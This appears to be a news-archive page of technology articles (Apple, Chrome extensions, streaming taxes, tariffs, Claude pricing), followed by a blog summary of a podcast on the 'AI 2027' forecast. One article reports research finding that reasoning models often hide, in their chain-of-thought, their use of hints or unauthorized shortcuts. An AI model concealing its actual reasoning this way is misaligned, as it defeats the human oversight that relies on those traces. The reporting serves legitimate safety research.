Author name: Kris Guyer

report:-apple-will-take-another-crack-at-ipad-multitasking-in-ipados-19

Report: Apple will take another crack at iPad multitasking in iPadOS 19

Apple is taking another crack at iPad multitasking, according to a report from Bloomberg’s Mark Gurman. This year’s iPadOS 19 release, due to be unveiled at Apple’s Worldwide Developers Conference on June 9, will apparently include an “overhaul that will make the tablet’s software more like macOS.”

The report is light on details about what’s actually changing, aside from a broad “focus on productivity, multitasking, and app window management.” But Apple will apparently continue to stop short of allowing users of newer iPads to run macOS on their tablets, despite the fact that modern iPad Airs and Pros use the same processors as Macs.

If this is giving you déjà vu, you’re probably thinking about iPadOS 16, the last time Apple tried making significant upgrades to the iPad’s multitasking model. Gurman’s reporting at the time even used similar language, saying that iPads running the new software would work “more like a laptop and less like a phone.”

The result of those efforts was Stage Manager. It had steep hardware requirements and launched in pretty rough shape, even though Apple delayed the release of the update by a month to keep polishing it. Stage Manager did allow for more flexible multitasking, and on newer models, it enabled true multi-monitor support for the first time. But early versions were buggy and frustrating in ways that still haven’t fully been addressed by subsequent updates (MacStories’ Federico Viticci keeps the Internet’s most comprehensive record of the issues with the software.)

Report: Apple will take another crack at iPad multitasking in iPadOS 19 Read More »

researcher-uncovers-dozens-of-sketchy-chrome-extensions-with-4-million-installs

Researcher uncovers dozens of sketchy Chrome extensions with 4 million installs

The extensions share other dubious or suspicious similarities. Much of the code in each one is highly obfuscated, a design choice that provides no benefit other than complicating the process for analyzing and understanding how it behaves.

All but one of them are unlisted in the Chrome Web Store. This designation makes an extension visible only to users with the long pseudorandom string in the extension URL, and thus, they don’t appear in the Web Store or search engine search results. It’s unclear how these 35 unlisted extensions could have fetched 4 million installs collectively, or on average roughly 114,000 installs per extension, when they were so hard to find.

Additionally, 10 of them are stamped with the “Featured” designation, which Google reserves for developers whose identities have been verified and “follow our technical best practices and meet a high standard of user experience and design.”

One example is the extension Fire Shield Extension Protection, which, ironically enough, purports to check Chrome installations for the presence of any suspicious or malicious extensions. One of the key JavaScript files it runs references several questionable domains, where they can upload data and download instructions and code:

URLs that Fire Shield Extension Protection references in its code. Credit: Secure Annex

One domain in particular—unknow.com—is listed in the remaining 34 apps.

Tuckner tried analyzing what extensions did on this site but was largely thwarted by the obfuscated code and other steps the developer took to conceal their behavior. When the researcher, for instance, ran the Fire Shield extension on a lab device, it opened a blank webpage. Clicking on the icon of an installed extension usually provides an option menu, but Fire Shield displayed nothing when he did it. Tuckner then fired up a background service worker in the Chrome developer tools to seek clues about what was happening. He soon realized that the extension connected to a URL at fireshieldit.com and performed some action under the generic category “browser_action_clicked.” He tried to trigger additional events but came up empty-handed.

Researcher uncovers dozens of sketchy Chrome extensions with 4 million installs Read More »

ai-isn’t-ready-to-replace-human-coders-for-debugging,-researchers-say

AI isn’t ready to replace human coders for debugging, researchers say

A graph showing agents with tools nearly doubling the success rates of those without, but still achieving a success score under 50 percent

Agents using debugging tools drastically outperformed those that didn’t, but their success rate still wasn’t high enough. Credit: Microsoft Research

This approach is much more successful than relying on the models as they’re usually used, but when your best case is a 48.4 percent success rate, you’re not ready for primetime. The limitations are likely because the models don’t fully understand how to best use the tools, and because their current training data is not tailored to this use case.

“We believe this is due to the scarcity of data representing sequential decision-making behavior (e.g., debugging traces) in the current LLM training corpus,” the blog post says. “However, the significant performance improvement… validates that this is a promising research direction.”

This initial report is just the start of the efforts, the post claims.  The next step is to “fine-tune an info-seeking model specialized in gathering the necessary information to resolve bugs.” If the model is large, the best move to save inference costs may be to “build a smaller info-seeking model that can provide relevant information to the larger one.”

This isn’t the first time we’ve seen outcomes that suggest some of the ambitious ideas about AI agents directly replacing developers are pretty far from reality. There have been numerous studies already showing that even though an AI tool can sometimes create an application that seems acceptable to the user for a narrow task, the models tend to produce code laden with bugs and security vulnerabilities, and they aren’t generally capable of fixing those problems.

This is an early step on the path to AI coding agents, but most researchers agree it remains likely that the best outcome is an agent that saves a human developer a substantial amount of time, not one that can do everything they can do.

AI isn’t ready to replace human coders for debugging, researchers say Read More »

turbulent-global-economy-could-drive-up-prices-for-netflix-and-rivals

Turbulent global economy could drive up prices for Netflix and rivals


“… our members are going to be punished.”

A scene from BBC’s Doctor Who. Credit: BBC/Disney+

Debate around how much taxes US-based streaming services should pay internationally, among other factors, could result in people paying more for subscriptions to services like Netflix and Disney+.

On April 10, the United Kingdom’s Culture, Media and Sport (CMS) Committee reignited calls for a streaming tax on subscription revenue acquired through UK residents. The recommendation came alongside the committee’s 120-page report [PDF] that makes numerous recommendations for how to support and grow Britain’s film and high-end television (HETV) industry.

For the US, the recommendation garnering the most attention is one calling for a 5 percent levy on UK subscriber revenue from streaming video on demand services, such as Netflix. That’s because if streaming services face higher taxes in the UK, costs could be passed onto consumers, resulting in more streaming price hikes. The CMS committee wants money from the levy to support HETV production in the UK and wrote in its report:

The industry should establish this fund on a voluntary basis; however, if it does not do so within 12 months, or if there is not full compliance, the Government should introduce a statutory levy.

Calls for a streaming tax in the UK come after 2024’s 25 percent decrease in spending for UK-produced high-end TV productions and 27 percent decline in productions overall, per the report. Companies like the BBC have said that they lack funds to keep making premium dramas.

In a statement, the CMS committee called for streamers, “such as Netflix, Amazon, Apple TV+, and Disney+, which benefit from the creativity of British producers, to put their money where their mouth is by committing to pay 5 percent of their UK subscriber revenue into a cultural fund to help finance drama with a specific interest to British audiences.” The committee’s report argues that public service broadcasters and independent movie producers are “at risk,” due to how the industry currently works. More investment into such programming would also benefit streaming companies by providing “a healthier supply of [public service broadcaster]-made shows that they can license for their platforms,” the report says.

The Department for Digital, Culture, Media and Sport has said that it will respond to the CMS Committee’s report.

Streaming companies warn of higher prices

In response to the report, a Netflix spokesperson said in a statement shared by the BBC yesterday that the “UK is Netflix’s biggest production hub outside of North America—and we want it to stay that way.” Netflix reportedly claims to have spent billions of pounds in the UK via work with over 200 producers and 30,000 cast and crew members since 2020, per The Hollywood Reporter. In May 2024, Benjamin King, Netflix’s senior director of UK and Ireland public policy, told the CMS committee that the streaming service spends “about $1.5 billion” annually on UK-made content.

Netflix’s statement this week, responding to the CMS Committee’s levy, added:

… in an increasingly competitive global market, it’s key to create a business environment that incentivises rather than penalises investment, risk taking, and success. Levies diminish competitiveness and penalise audiences who ultimately bear the increased costs.

Adam Minns, executive director for the UK’s Association for Commercial Broadcasters and On-Demand Services (COBA), highlighted how a UK streaming tax could impact streaming providers’ content budgets.

“Especially in this economic climate, a levy risks impacting existing content budgets for UK shows, jobs, and growth, along with raising costs for businesses,” he said, per the BBC.

An anonymous source that The Hollywood Reporter described as “close to the matter” said that “Netflix members have already paid the BBC license fee. A levy would be a double tax on them and us. It’s unfair. This is a tariff on success. And our members are going to be punished.”

The anonymous source added: “Ministers have already rejected the idea of a streaming levy. The creation of a Cultural Fund raises more questions than it answers. It also begs the question: Why should audiences who choose to pay for a service be then compelled to subsidize another service for which they have already paid through the license fee. Furthermore, what determines the criteria for ‘Britishness,’ which organizations would qualify for funding … ?”

In May, Mitchel Simmons, Paramount’s VP of EMEA public policy and government affairs, also questioned the benefits of a UK streaming tax when speaking to the CMS committee.

“Where we have seen levies in other jurisdictions on services, we then see inflation in the market. Local broadcasters, particularly in places such as Italy, have found that the prices have gone up because there has been a forced increase in spend and others have suffered as a consequence,” he said at the time.

Tax threat looms largely on streaming companies

Interest in the UK putting a levy on streaming services follows other countries recently pushing similar fees onto streaming providers.

Music streaming providers, like Spotify, for example, pay a 1.2 percent tax on streaming revenue made in France. Spotify blamed the tax for a 1.2 percent price hike in the country issued in May. France’s streaming taxes are supposed to go toward the Centre National de la Musique.

Last year, Canada issued a 5 percent tax on Canadian streaming revenue that’s been halted as companies including Netflix, Amazon, Apple, Disney, and Spotify battle it in court.

Lawrence Zhang, head of policy of the Centre for Canadian Innovation and Competitiveness at the Information Technology and Innovation Foundation think tank, has estimated that a 5 percent streaming tax would result in the average Canadian family paying an extra CA$40 annually.

A streaming provider group called the Digital Media Association has argued that the Canadian tax “could lead to higher prices for Canadians and fewer content choices.”

“As a result, you may end up paying more for your favourite streaming services and have less control over what you can watch or listen to,” the Digital Media Association’s website says.

Streaming companies hold their breath

Uncertainty around US tariffs and their implications on the global economy have also resulted in streaming companies moving slower than expected regarding new entrants, technologies, mergers and acquisitions, and even business failures, Alan Wolk, co-founder and lead analyst at TVRev, pointed out today. “The rapid-fire nature of the executive orders coming from the White House” has a massive impact on the media industry, he said.

“Uncertainty means that deals don’t get considered, let alone completed,” Wolk mused, noting that the growing stability of the streaming industry overall also contributes to slowing market activity.

For consumers, higher prices for other goods and/or services could result in smaller budgets for spending on streaming subscriptions. Establishing and growing advertising businesses is already a priority for many US streaming providers. However, the realities of stingier customers who are less willing to buy multiple streaming subscriptions or opt for premium tiers or buy on-demand titles are poised to put more pressure on streaming firms’ advertising plans. Simultaneously, advertisers are facing pressures from tariffs, which could result in less money being allocated to streaming ads.

“With streaming platform operators increasingly turning to ad-supported tiers to bolster profitability—rather than just rolling out price increases—this strategy could be put at risk,” Matthew Bailey, senior principal analyst of advertising at Omdia, recently told Wired. He added:

Against this backdrop, I wouldn’t be surprised if we do see some price increases for some streaming services over the coming months.

Streaming service providers are likely to tighten their purse strings, too. As we’ve seen, this can result in price hikes and smaller or less daring content selection.   

Streaming customers may soon be forced to reduce their subscriptions. The good news is that most streaming viewers are already accustomed to growing prices and have figured out which streaming services align with their needs around affordability, ease of use, content, and reliability. Customers may set higher standards, though, as streaming companies grapple with the industry and global changes.

Photo of Scharon Harding

Scharon is a Senior Technology Reporter at Ars Technica writing news, reviews, and analysis on consumer gadgets and services. She’s been reporting on technology for over 10 years, with bylines at Tom’s Hardware, Channelnomics, and CRN UK.

Turbulent global economy could drive up prices for Netflix and rivals Read More »

researchers-concerned-to-find-ai-models-hiding-their-true-“reasoning”-processes

Researchers concerned to find AI models hiding their true “reasoning” processes

Remember when teachers demanded that you “show your work” in school? Some fancy new AI models promise to do exactly that, but new research suggests that they sometimes hide their actual methods while fabricating elaborate explanations instead.

New research from Anthropic—creator of the ChatGPT-like Claude AI assistant—examines simulated reasoning (SR) models like DeepSeek’s R1, and its own Claude series. In a research paper posted last week, Anthropic’s Alignment Science team demonstrated that these SR models frequently fail to disclose when they’ve used external help or taken shortcuts, despite features designed to show their “reasoning” process.

(It’s worth noting that OpenAI’s o1 and o3 series SR models deliberately obscure the accuracy of their “thought” process, so this study does not apply to them.)

To understand SR models, you need to understand a concept called “chain-of-thought” (or CoT). CoT works as a running commentary of an AI model’s simulated thinking process as it solves a problem. When you ask one of these AI models a complex question, the CoT process displays each step the model takes on its way to a conclusion—similar to how a human might reason through a puzzle by talking through each consideration, piece by piece.

Having an AI model generate these steps has reportedly proven valuable not just for producing more accurate outputs for complex tasks but also for “AI safety” researchers monitoring the systems’ internal operations. And ideally, this readout of “thoughts” should be both legible (understandable to humans) and faithful (accurately reflecting the model’s actual reasoning process).

“In a perfect world, everything in the chain-of-thought would be both understandable to the reader, and it would be faithful—it would be a true description of exactly what the model was thinking as it reached its answer,” writes Anthropic’s research team. However, their experiments focusing on faithfulness suggest we’re far from that ideal scenario.

Specifically, the research showed that even when models such as Anthropic’s Claude 3.7 Sonnet generated an answer using experimentally provided information—like hints about the correct choice (whether accurate or deliberately misleading) or instructions suggesting an “unauthorized” shortcut—their publicly displayed thoughts often omitted any mention of these external factors.

Researchers concerned to find AI models hiding their true “reasoning” processes Read More »

fda-backpedals-on-rto-to-stop-talent-hemorrhage-after-hhs-bloodbath

FDA backpedals on RTO to stop talent hemorrhage after HHS bloodbath

The Food and Drug Administration is reinstating telework for staff who review drugs, medical devices, and tobacco, according to reporting by the Associated Press. Review staff and supervisors are now allowed to resume telework at least two days a week, according to an internal email obtained by the AP.

The move reverses a jarring return-to-office decree by the Trump administration, which it used to spur resignations from federal employees. Now, after a wave of such resignations and a brutal round of layoffs that targeted about 3,500 staff, the move to restore some telework appears aimed at keeping the remaining talent amid fears that the agency’s review capabilities are at risk of collapse.

The cut of 3,500 staff is a loss of about 19 percent of the agency’s workforce, and staffers told the AP that lower-level employees are “pouring” out of the agency amid the Trump administration’s actions. Entire offices responsible for FDA policies and regulations have been shuttered. Most of the agency’s communication staff have been wiped out, as well as teams that support food inspectors and investigators, the AP reported.

Reviewers are critical staff with unique features. Staff who review new potential drugs, medical devices, and tobacco products are largely funded by user fees—fees that companies pay the FDA to review their products efficiently. Nearly half the FDA’s $7 billion budget comes from these fees, and 70 percent of the FDA’s drug program is funded by them.

FDA backpedals on RTO to stop talent hemorrhage after HHS bloodbath Read More »

after-months-of-user-complaints,-anthropic-debuts-new-$200/month-ai-plan

After months of user complaints, Anthropic debuts new $200/month AI plan

Pricing Hierarchical tree structure with central stem, single tier of branches, and three circular nodes with larger circle at top Free Try Claude $0 Free for everyone Try Claude Chat on web, iOS, and Android Generate code and visualize data Write, edit, and create content Analyze text and images Hierarchical tree structure with central stem, two tiers of branches, and five circular nodes with larger circle at top Pro For everyday productivity $18 Per month with annual subscription discount; $216 billed up front. $20 if billed monthly. Try Claude Everything in Free, plus: More usage Access to Projects to organize chats and documents Ability to use more Claude models Extended thinking for complex work Hierarchical tree structure with central stem, three tiers of branches, and seven circular nodes with larger circle at top Max 5x–20x more usage than Pro From $100 Per person billed monthly Try Claude Everything in Pro, plus: Substantially more usage to work with Claude Scale usage based on specific needs Higher output limits for better and richer responses and Artifacts Be among the first to try the most advanced Claude capabilities Priority access during high traffic periods

A screenshot of various Claude pricing plans captured on April 9, 2025. Credit: Benj Edwards

Probably not coincidentally, the highest Max plan matches the price point of OpenAI’s $200 “Pro” plan for ChatGPT, which promises “unlimited” access to OpenAI’s models, including more advanced models like “o1-pro.” OpenAI introduced this plan in December as a higher tier above its $20 “ChatGPT Plus” subscription, first introduced in February 2023.

The pricing war between Anthropic and OpenAI reflects the resource-intensive nature of running state-of-the-art AI models. While consumer expectations push for unlimited access, the computing costs for running these models—especially with longer contexts and more complex reasoning—remain high. Both companies face the challenge of satisfying power users while keeping their services financially sustainable.

Other features of Claude Max

Beyond higher usage limits, Claude Max subscribers will also reportedly receive priority access to unspecified new features and models as they roll out. Max subscribers will also get higher output limits for “better and richer responses and Artifacts,” referring to Claude’s capability to create document-style outputs of varying lengths and complexity.

Users who subscribe to Max will also receive “priority access during high traffic periods,” suggesting Anthropic has implemented a tiered queue system that prioritizes its highest-paying customers during server congestion.

Anthropic’s full subscription lineup includes a free tier for basic access, the $18–$20 “Pro” tier for everyday use (depending on annual or monthly payment plans), and the $100–$200 “Max” tier for intensive usage. This somewhat mirrors OpenAI’s ChatGPT subscription structure, which offers free access, a $20 “Plus” plan, and a $200 “Pro” plan.

Anthropic says the new Max plan is available immediately in all regions where Claude operates.

After months of user complaints, Anthropic debuts new $200/month AI plan Read More »

windows-11’s-copilot-vision-wants-to-help-you-learn-to-use-complicated-apps

Windows 11’s Copilot Vision wants to help you learn to use complicated apps

Some elements of Microsoft’s Copilot assistant in Windows 11 have felt like a solution in search of a problem—and it hasn’t helped that Microsoft has frequently changed Copilot’s capabilities, turning it from a native Windows app into a web app and back again.

But I find myself intrigued by a new addition to Copilot Vision that Microsoft began rolling out this week to testers in its Windows Insider program. Copilot Vision launched late last year as a feature that could look at pages in the Microsoft Edge browser and answer questions based on those pages’ contents. The new Vision update extends that capability to any app window, allowing you to ask Copilot not just about the contents of a document but also about the user interface of the app itself.

Microsoft’s Copilot Vision update can see the contents of any app window you share with it. Credit: Microsoft

Provided the app works as intended—not a given for any software, but especially for AI features—Copilot Vision could replace “frantic Googling” as a way to learn how to use a new app or how to do something new or obscure in complex PC apps like Word, Excel, or Photoshop. I recently switched from Photoshop to Affinity Photo, for example, and I’m still finding myself tripped up by small differences in workflows and UI between the two apps. Copilot Vision could, in theory, ease that sort of transition.

Windows 11’s Copilot Vision wants to help you learn to use complicated apps Read More »

mario-kart-world’s-$80-price-isn’t-that-high,-historically

Mario Kart World’s $80 price isn’t that high, historically

We assembled data for those game baskets across 21 non-consecutive years, going back to 1982, then normalized the nominal prices to consistent February 2025 dollars using the Bureau of Labor Statistics CPI calculator. You can view all our data and sources in this Google Sheet.

The bad old days

In purely nominal terms, the $30 to $40 retailers routinely charged for game cartridges in the 1980s seems like a relative bargain. Looking at the inflation-adjusted data, though, it’s easy to see how even an $80 game today would seem like a bargain to console gamers in the cartridge era.

Video game cartridges were just historically expensive, even compared to today’s top-end games.

Credit: Kyle Orland / Ars Technica

Video game cartridges were just historically expensive, even compared to today’s top-end games. Credit: Kyle Orland / Ars Technica

New cartridge games in the 20th century routinely retailed for well over $100 in 2025 money, thanks to a combination of relatively high manufacturing costs and relatively low competition in the market. While you could often get older and/or used cartridges for much less than that in practice, must-have new games at the time often cost the equivalent of $140 or more in today’s money.

Pricing took a while to calm down once CD-based consoles were introduced in the late ’90s. By the beginning of the ’00s, though, nominal top-end game pricing had fallen to about $50, and only rose back to $60 by the end of the decade. Adjusting for inflation, however, those early 21st century games were still demanding prices approaching $90 in 2025 dollars, well above the new $80 nominal price ceiling Mario Kart World is trying to establish.

Those $50 discs you remember from the early 21st century were worth a lot more after you adjust for inflation.

Credit: Kyle Orland / Ars Technica

Those $50 discs you remember from the early 21st century were worth a lot more after you adjust for inflation. Credit: Kyle Orland / Ars Technica

In the 2010s, inflation started eating into the value of gaming’s de facto $60 price ceiling, which remained remarkably consistent throughout the decade. Adjusted for inflation, the nominal average pricing we found for our game “baskets” in 2013, 2017, and 2020 ended up almost precisely equivalent to $80 in constant 2025 dollars.

Is this just what things cost now?

While the jump to an $80 price might seem sudden, the post-COVID jump in inflation makes it almost inevitable. After decades of annual inflation rates in the 2 to 3 percent range, the Consumer Price Index jumped 4.7 percent in 2021 and a whopping 8 percent in 2022. In the years since, annual price increases still haven’t gotten below the 3 percent level that was once seen as “high.”

Mario Kart World’s $80 price isn’t that high, historically Read More »

japanese-railway-shelter-replaced-in-less-than-6-hours-by-3d-printed-model

Japanese railway shelter replaced in less than 6 hours by 3D-printed model

Hatsushima is not a particularly busy station, relative to Japanese rail commuting as a whole. It serves a town (Arida) of about 25,000, known for mandarin oranges and scabbardfish, that is shrinking in population, like most of Japan. Its station sees between one to three trains per hour at its stop, helping about 530 riders find their way. Its wooden station was due for replacement, and the replacement could be smaller.

The replacement, it turned out, could also be a trial for industrial-scale 3D-printing of custom rail shelters. Serendix, a construction firm that previously 3D-printed 538-square-foot homes for about $38,000, built a shelter for Hatsushima in about seven days, as shown at The New York Times. The fabricated shelter was shipped in four parts by rail, then pieced together in a span that the site Futurism says is “just under three hours,” but which the Times, seemingly present at the scene, pegs at six. It was in place by the first train’s arrival at 5: 45 am.

Either number of hours is a marked decrease from the days or weeks you might expect for a new rail station to be constructed. In one overnight, teams assembled a shelter that is 2.6 meters (8.5 feet) tall and 10 square meters (32 square feet) in area. It’s not actually in use yet, as it needs ticket machines and finishing, but is expected to operate by July, according to the Japan Times.

Japanese railway shelter replaced in less than 6 hours by 3D-printed model Read More »

trump-gives-china-one-day-to-end-retaliations-or-face-extra-50%-tariffs

Trump gives China one day to end retaliations or face extra 50% tariffs


China expects to outlast US in trade war, alarming Big Tech.

Tech companies’ worst nightmare ahead of Donald Trump’s election has already come true, as the US and China are now fully engaged in a tit-for-tat trade war, where China claims it expects to be better positioned to withstand US blows long-term.

Trump has claimed that Americans must take their “medicine,” bearing any pains from tariffs while waiting for supposed long-term gains from potentially pressuring China—and every other country, including islands of penguins—into a more favorable trade deal. On Monday, tech companies across the US likely winced when Trump threatened to heap “additional” 50 percent tariffs on China, after China announced retaliatory 34 percent tariffs on US imports and restricted US access to rare earth metals.

Posting on Truth Social, Trump gave China one day to withdraw tariffs to avoid higher US tariffs.

As of this writing, the trade rivals remain in a stand-off, with US tech companies taking hits in the form of higher costs and supply chain disruptions from both sides.

Trump is apparently hoping that his threat will send China cowering before their retaliatory tariffs kick in April 10, while China appears to feel that it has little reason to back down. According to CNN, “a flurry of state media coverage and government statements” flooded Chinese news sites over the weekend, reassuring Chinese citizens and businesses that “US tariffs will have an impact (on China), but ‘the sky won’t fall.'”

“Since the US initiated the (first) trade war in 2017—no matter how the US fights or presses—we have continued to develop and progress, demonstrating resilience—’the more pressure we get, the stronger we become,'” a Sunday story in the “Chinese Communist Party’s mouthpiece People’s Daily read,” CNN reported.

For China, the bet seems to be that by imposing tariffs broadly, the US will drive other countries to deepen their investments in China. If the US loses too much business, while China potentially gains, then China could potentially emerge as the global leader, possibly thwarting Trump’s efforts to use tariffs as a weapon driving investment into the US.

Trump has no plans to pause tariffs

Currently, duties on all Chinese imports coming into the US are over 54 percent, CNN reported. And Trump’s threat of additional tariffs, while unclear precisely how much it would move the needle, would certainly push that figure above the 60 percent threshold that had US tech companies scrambling last year to warn of potentially dire impacts to the US economy.

At that time, the Consumer Technology Association (CTA) warned that laptop prices could nearly double, game console prices could rise by 40 percent, and smartphone prices by 26 percent. Now, the CTA has joined those warning that Trump’s tariffs could not only spark price hikes but also potentially cause a recession.

“These tariffs will raise consumer prices and will force our trade partners to retaliate,” Gary Shapiro, CTA’s CEO and vice chair, wrote in a press statement. “Americans will become poorer because of these tariffs.”

Various reports following Trump’s tariffs announcement signal prices could soon match CTA’s forecast or go even higher. PC vendors told PCMag they’re already preparing for prices economists estimate could increase by 45 percent by this time the next year. And Apple products like iPhones, iPads, MacBooks, and AirPods could increase by 40 percent, a financial planning analyst told CNET. Meanwhile, the entire game industry is apparently bracing, as China is one of two countries where most console hardware is produced.

With stocks plummeting, Trump has refused to back down, seeming particularly unwilling to relent from his hard stance against China. He has branded rumors that he might pause tariffs “fake news,” even as his aggressive tariff regime has disrupted markets for the US and many allies, like Australia, Japan, South Korea, and India. Commerce Secretary Howard Lutnick even defended imposing tariffs on the islands of penguins by insisting that any path any country may take to dodge tariffs by diverting shipments must be cut off.

“The idea is that there are no countries left off,” Lutnick told CBS News.

According to Lutnick, Trump is “resetting global trade,” and controversial tariffs will remain in place for potentially weeks, while Trump hopes to push more companies to manufacture products in the US.

Americans “will feel real pain,” tech group warned

Back in February, economist and trade expert Mary Lovely warned in a New York Times op-ed that Trump’s push for an “arbitrary” trade policy might make investing in the US “less attractive” by creating too much instability. Imagine a tech company diverts manufacturing into the US, only to have its supply chain disrupted by arbitrary tariffs. They might “think twice” about building here, Lovely suggested, which could possibly push US allies to find other partners—perhaps even benefiting China, if commercial ties are deepened there instead of in the US.

Economists told Chinese media that countries hit by US tariffs are already looking to deepen ties with China, CNN reported. According to those experts, China is “ready to compete with the US in redefining the new global trade system” and cannot afford to “tolerate US bullying.”

In her op-ed, Lovely suggested that Congress could intervene to possibly disrupt Trump’s trade policy in pursuit of “a fairer, more resilient economy.”

Last week, Politico reported that some top Republicans are pushing to reassert Congress’ power over tariffs as the trade war escalates. They’ve introduced a bill that would force Trump to give Congress 48 hours’ notice before imposing tariffs and to get congressional approval 60 days before tariffs could kick in. That could help companies avoid experiencing whiplash but wouldn’t necessarily change the trade policy. And lawmakers may entertain the bill, since the CTA warned that Republicans may lose voters if they don’t intervene.

“Make no mistake: American consumers, families, and workers will feel real pain, and elected policymakers in Washington will be held accountable by voters,” Shapiro said.

However, “it’s highly unlikely this proposal will ever become law,” Politico noted, as the majority of Republicans who control both chambers appear unlikely to support it.

In the meantime, Trump’s use of tariffs as a weapon could stoke never-before-seen retaliations from China, the CTA’s VP of International Trade, Ed Brzytwa, told Ars last year. That could include retaliation outside the economic arena, Brzytwa said, if China runs out of ways to strike back to hurt the US’s bottomline.

Panicked by the trade war, many Americans are rushing to make big-ticket purchases before prices shift, Fortune reported, perhaps hurting future demand for tech companies’ products.

For tech companies like Apple—which promised to invest $500 billion in the US, likely to secure tariff exemptions—Trump’s trade war threatens long-term supply chain disruptions, spiked costs, and unhappy customers potentially suddenly unable to afford even their latest devices. (Elsewhere, Switch 2 fans were recently dismayed when tariffs delayed deliveries of their preorders.)

And it kind of goes without saying that Trump’s long-term plan to push investments and supply chains into the US needs more than weeks to fulfill. Even if all companies strove to quickly move manufacturing into the US and blocked all imports from China within the next decade, Lovely told Ars last year, “we would still have a lot of imports from China because Chinese value added is going to be embedded in things we import from Vietnam and Thailand and Indonesia and Mexico.”

Ultimately, the US may never be able to push China out of global markets, and even coming close would likely require coordination across several presidential terms, Lovely suggested.

“The tariffs can be effective in changing these direct imports, as we’ve seen, yeah, but they’re not going to really push China out of the global economy,” Lovely told Ars.

Photo of Ashley Belanger

Ashley is a senior policy reporter for Ars Technica, dedicated to tracking social impacts of emerging policies and new technologies. She is a Chicago-based journalist with 20 years of experience.

Trump gives China one day to end retaliations or face extra 50% tariffs Read More »

ai-2027:-dwarkesh’s-podcast-with-daniel-kokotajlo-and-scott-alexander

AI 2027: Dwarkesh’s Podcast with Daniel Kokotajlo and Scott Alexander

Daniel Kokotajlo has launched AI 2027, Scott Alexander introduces it here. AI 2027 is a serious attempt to write down what the future holds. His ‘What 2026 Looks Like’ was very concrete and specific, and has proved remarkably accurate given the difficulty level of such predictions.

I’ve had the opportunity to play the wargame version of the scenario described in 2027, and I reviewed the website prior to publication and offered some minor notes. Whenever I refer to a ‘scenario’ in this post I’m talking about Scenario 2027.

There’s tons of detail here. The research here, and the supporting evidence and citations and explanations, blow everything out of the water. It’s vastly more than we usually see, and dramatically different from saying ‘oh I expect AGI in 2027’ or giving a timeline number. This lets us look at what happens in concrete detail, figure out where we disagree, and think about how that changes things.

As Daniel and Scott emphasize in their podcast, this is an attempt at a baseline or median scenario. It deliberately doesn’t assume anything especially different or weird happens, only that trend lines keep going. It turns out that when you do that, some rather different and weird things happen. The future doesn’t default to normality.

I think this has all been extremely helpful. When I was an SFF recommender, I put this project as my top charity in the entire round. I would do it again.

I won’t otherwise do an in-depth summary of Daniel’s scenario here. The basic outline is, AI progress steadily accelerates, there is a race with China driving things forward, and whether we survive depends on a key choice we make (and us essentially getting lucky in various ways, given the scenario we are in).

This first post coverages Daniel and Scott’s podcast with Dwarkesh. Ideally I’d suggest reading Scenario 2027 first, then listening to the podcast, but either order works. If you haven’t read Scenario 2027, reading this or listening to the podcast, or both, will get you up to speed on what Scenario 2027 is all about well enough for the rest of the discussions.

Tomorrow, in a second post, I’ll cover other reactions to AI 2027. You should absolutely skip the ones that do not interest you, especially the long quotes, next steps and then the lighter side.

For bandwidth reasons, I won’t be laying out ‘here are all my disagreements with Scenario 2027.’ I might write a third post for that purpose later.

There was also another relevant podcast, where Daniel Kokotajlo went on friend-of-the-blog Liv Boeree’s Win-Win (timestamps here). This one focused on Daniel’s history and views overall rather than AI 2027 in particular. They spend a lot of time on the wargame version of the scenario, which Liv and I participated in together.

I gave it my full podcast coverage treatment.

Timestamps are for the YouTube version. Main bullet points are descriptive. The secondary notes are my commentary.

The last bits are about things other than the scenario. I’m not going to cover that here.

  • (1: 30) This is a concrete scenario of how superintelligence might play out. Previously, we didn’t have one of those. Lots of people say ‘AGI in three years’ but they don’t provide any detail. Now we can have a concrete scenario to talk about.

  • (2: 15) The model is attempting to be as accurate as possible. Daniel’s previous attempt, What 2026 Looks Like, has plenty of mistakes but is about as good as such predictions ever look in hindsight.

  • (4: 15) Scott Alexander was brought on board to help with the writing. He shares the background on when Daniel left OpenAI and refused to sign the NDA, and lays out the superstar team involved in this forecasting.

  • (7: 00) Dwarkesh notes he goes back and forth on whether or not he expects the intelligence explosion.

  • (7: 45) We start now with a focus on agents, with they expect to rapidly improve. There is steady improvement in 2025 and 2026, then in 2027 the agents start doing the AI research, multiplying research progress, and things escalate quickly.

  • (9: 30) Dwarkesh gets near term and concrete: Will computer use be solved in 2025? Daniel expects the agents will stop making mouse click errors like they do now or fail to parse the screen or make other silly mistakes, but they won’t be able to operate autonomously for extended periods on their own. The MVP of the agent that runs parties and such will be ready, but it will still make mistakes. But that kind of question wasn’t their focus.

    1. That seems reasonable to me. I’m probably a bit more near term optimistic about agent capabilities than this, but only a bit, I’ve been disappointed so far.

  • (11: 20) Dwarkesh asks: Why couldn’t you tell this story in 2021? Why were the optimists wrong? What’s taking so long and why aren’t we seeing that much impact? Scott points out that advances have consistently been going much faster than most predictions, Daniel affirms that most people have underestimated both progress and diffusion rates. Scott points to Metaculus, where predictions keep expecting things to go faster.

    1. The question of why this didn’t go even faster is still a good one.

  • (14: 30) Dwarkesh reports he asked a serious high level AI researcher how much AI is helping him. The answer was, maybe 4-8 hours a week in tasks the researcher knows well, but where he knows less it’s more like 24 hours a week. Daniel’s explanation is that the LLMs help you learn about domains.

    1. My experiences very much match all this. The less I know, the more the AIs help. In my core writing the models are marginal. When coding or doing things I don’t know how to do, the gains are dramatic, sometimes 10x or more.

  • (15: 15) Why can’t LLMs use all their knowledge to make new discoveries yet? Scott responds humans also can’t do this. We know a lot of things, but we don’t make the connections between them until the question is shoved in your face. Dwarkesh pushes back, saying humans sometimes totally do the thing. Scott says Dwarkesh’s example is very different, more like standard learning, and we don’t have good enough heuristics to let the AIs do that yet but we can and will later. Daniel basically says we haven’t tried it yet, and we haven’t trained the model to do the thing. And when in doubt make the model bigger.

    1. I agree with Scott that don’t think the thing Dwarkesh is describing is similar to the thing LLMs so far haven’t done.

    2. It’s still a very good question where all the discoveries are. It largely seems like we should be able to figure out how to make the AI version good enough, and the problem is we essentially haven’t tried to do the thing. If we wanted this badly enough, we’d do a list of things and we haven’t done any of them.

  • (21: 00) Dwarkesh asks, but it’s so valuable, why not do this? Daniel points out that setting up the RL for this is gnarly, and in the scenario it takes a lot of iterating on coding before the AIs start doing this sort of thing. Scott points out you would absolutely expect these problems to get solved by 2100, and that one way to look at the scenario is that with the research progress multiplier, the year 2100 gets here rather sooner than you expect.

    1. I bet we could get this research taste problem, as it were, solved faster than in the scenario, if we focused on that. It’s not clear that we should do that rather than wait for the ability to do that research vastly faster.

